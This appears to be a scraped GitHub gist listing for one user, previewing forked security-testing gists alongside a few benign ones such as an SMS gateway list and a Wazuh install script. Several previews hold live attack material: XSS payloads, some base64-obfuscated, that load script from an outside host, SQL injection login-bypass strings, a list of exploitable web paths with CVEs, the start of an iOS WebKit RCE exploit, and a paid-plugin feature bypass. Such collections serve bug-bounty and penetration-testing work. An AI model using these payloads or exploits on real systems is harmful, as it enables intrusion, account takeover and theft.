| Exploit/description | Path |
|---|---|
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
Halim Jabbes hxlxmjxbbxs
🚩
hxlxmjxbbxs
/ exploitable_webpaths.md
Created
December 30, 2023 04:12
— forked from kafkaesqu3/exploitable_webpaths.md
easy wins - exploitable/leaky web paths
hxlxmjxbbxs
/ subdomain_wordlist.md
Created
November 28, 2023 03:37
— forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
hxlxmjxbbxs
/ m2sms
Created
November 18, 2023 23:45
— forked from spangey/m2sms
Email to SMS gateways in YAML
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| config: | |
| from_address: [email protected] | |
| carriers: | |
| alltel: | |
| name: Alltel | |
| value: @message.alltel.com | |
| ameritech: | |
| name: Ameritech | |
| value: @paging.acswireless.com |
hxlxmjxbbxs
/ allinonemigration.md
Created
October 3, 2023 10:23
— forked from giovanni-d/allinonemigration.md
All-in-One WP Migration - Restore From Server (without PRO version) - Restore
If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, follow the instructions below:
- Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
- On line 1208, replace the code below:
$('.ai1wm-backup-restore').click(function (e) {
hxlxmjxbbxs
/ xss_payloads.txt
Created
September 12, 2023 17:37
— forked from nullenc0de/xss_payloads.txt
XSS_Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "><script src="https://js.rip/t9eoip8zws"></script> | |
| javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)') | |
| "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> | |
| "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> | |
| "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> | |
| "><iframe srcdoc="<script>var a=parent.document.createElement("scr&# |
hxlxmjxbbxs
/ sqli-auth-bypass.txt
Created
September 8, 2023 00:35
— forked from spenkk/sqli-auth-bypass.txt
SQL Injection Authentication Bypass payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| or 1=1 | |
| or 1=1-- | |
| or 1=1# | |
| or 1=1/* | |
| admin' -- | |
| admin' # | |
| admin'/* | |
| admin' or '1'='1 | |
| admin' or '1'='1'-- | |
| admin' or '1'='1'# |
hxlxmjxbbxs
/ JavascriptRecon.md
Created
July 21, 2023 06:20
— forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty
hxlxmjxbbxs
/ deobf.cmd
Created
April 1, 2023 17:25
— forked from a-sync/deobf.cmd
batch obfuscator / deobfuscator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off & setlocal | |
| if "%~1"=="" exit /b | |
| if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b | |
| <"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1") |
hxlxmjxbbxs
/ fuck.js
Created
November 19, 2022 15:14
— forked from ujin5/fuck.js
WebKit RCE on ios 14.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
hxlxmjxbbxs
/ wazuhinstall.sh
Last active
October 15, 2022 04:29
— forked from austinsonger/wazuhinstall.sh
Wazuh Install - Single Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Requirements | |
| sudo apt install curl apt-transport-https unzip wget libcap2-bin software-properties-common lsb-release -y | |
| sudo apt install gpgv gpgsm gnupg-l10n gnupg dirmngr -y | |
| add-apt-repository ppa:openjdk-r/ppa | |
| sudo apt update -y | |
| sudo curl -so /etc/profile.d/myenvvars.sh https://gist.githubusercontent.com/austinsonger/2385ff1ef5ccb014aaed4d8684dd6e54/raw/e1d9b85b3383d1a50a54eac68ab7ad7c3e0c2797/myenvvars.sh | |
| export JAVA_HOME=/usr/ | |
| sudo apt install openjdk-11-jdk -y | |
| # Wazuh Prep |
NewerOlder